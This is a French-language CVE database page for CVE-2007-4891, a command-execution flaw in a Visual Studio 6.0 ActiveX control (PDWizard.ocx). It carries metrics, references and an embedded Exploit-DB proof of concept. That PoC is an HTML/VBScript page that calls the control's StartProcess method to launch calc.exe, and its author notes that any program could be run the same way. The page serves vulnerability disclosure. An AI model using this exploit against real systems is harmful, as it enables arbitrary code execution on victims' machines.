CVE-2007-4891 : Détail

CVE-2007-4891

OS Command Injection
A03-Injection
86.22%V3
Network
2007-09-13
23h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

A certain ActiveX control in PDWizard.ocx 6.0.0.9782 and earlier in Microsoft Visual Studio 6.0 exposes dangerous (1) StartProcess, (2) SyncShell, (3) SaveAs, (4) CABDefaultURL, (5) CABFileName, and (6) CABRunFile methods, which allows remote attackers to execute arbitrary programs and have other impacts, as demonstrated using absolute pathnames in arguments to StartProcess and SyncShell.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 4393

Date de publication : 2007-09-10 22h00 +00:00
Auteur : shinnai
EDB Vérifié : Yes

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">------------------------------------------------------------------------------------------------------ <b>Microsoft Visual Studio 6.0 PDWizard (PDWizard.ocx <= 6.0.0.9782) Remote Arbitrary Command Execution</b> url: http://www.microsoft.com author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage. Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 <b><font color='red'>greetz to: Wiz001 (be safe brotha... and see soon :D)</font></b> <b>Description: This ocx contains a lot of extreme dangerous methods. Theese two are very interesting, they are: "StartProcess()" and "SyncShell()" Using one of them, you'll be able to run every program you like, simply giving to the method the right argument. In this PoC, I use the "StartProcess()" method to execute the calc.exe, but you can do everything you like. Anyway, I think you could imagine what impact could have this kind of vulnerability :D Other dangerous methods of this ocx are: "SaveAs()" "CABDefaultURL()" "CABFileName()" "CABRunFile()"</b> ------------------------------------------------------------------------------------------------------ <object classid='clsid:0DDF3C0B-E692-11D1-AB06-00AA00BDD685' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language = 'vbscript'> Sub tryMe() test.StartProcess "c:\windows\system32\calc.exe", "False" 'you can change with your favourite application ;) End Sub </script> </span></span> </code></pre> # milw0rm.com [2007-09-11]

Products Mentioned

Configuraton 0

Microsoft>>Visual_studio >> Version 6.0

Microsoft>>Visual_studio >> Version 6.0.0.9782

    Références

    https://www.exploit-db.com/exploits/4393
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://osvdb.org/37106
    Tags : vdb-entry, x_refsource_OSVDB
    http://secunia.com/advisories/26779
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.securityfocus.com/bid/25638
    Tags : vdb-entry, x_refsource_BID